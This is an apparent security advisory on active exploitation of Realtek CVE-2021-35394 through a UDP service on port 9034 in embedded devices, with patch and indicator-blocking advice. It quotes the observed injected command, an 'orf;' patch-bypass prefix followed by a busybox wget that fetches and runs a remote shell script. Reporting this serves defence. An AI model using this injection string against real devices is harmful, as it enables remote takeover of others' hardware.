Researchers at Juniper Threat Labs have found that the threat actors are actively exploiting RealTek CVE-2021-35394 disclosed last week. The attack is specifically targets the Realtek RTL8xxx SoC chipsets that are used in embedded devices. The attack concerns a UDP server running on port 9034, that would allow the attacker to execute remote code execution of arbitrary commands. This was patched but was easily circumvented by prepending “orf;” to any injected command string:
Exploits require only a single UDP packet from the attacker. Each observed variant of this attack follows the same steps. First, the attackers use the open UDP server to inject a shell command:
UDP Packer sent by attacker
The injected command, seen in the data field above, is:
orf;cd /tmp||cd /var&&busybox wget hxxp://45[.]61.188.184/f.sh -O b.sh&&sh b.sh;#
Realtek Jungle SDK could allow a remote attacker to execute arbitrary commands on the system, caused by multiple memory corruption vulnerabilities in MP Daemon diagnostic tool. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system.
Block all threat indicators at your respective controls.
Search for IOCs in your environment.
For CVE-2021-35394 follow the link for patch.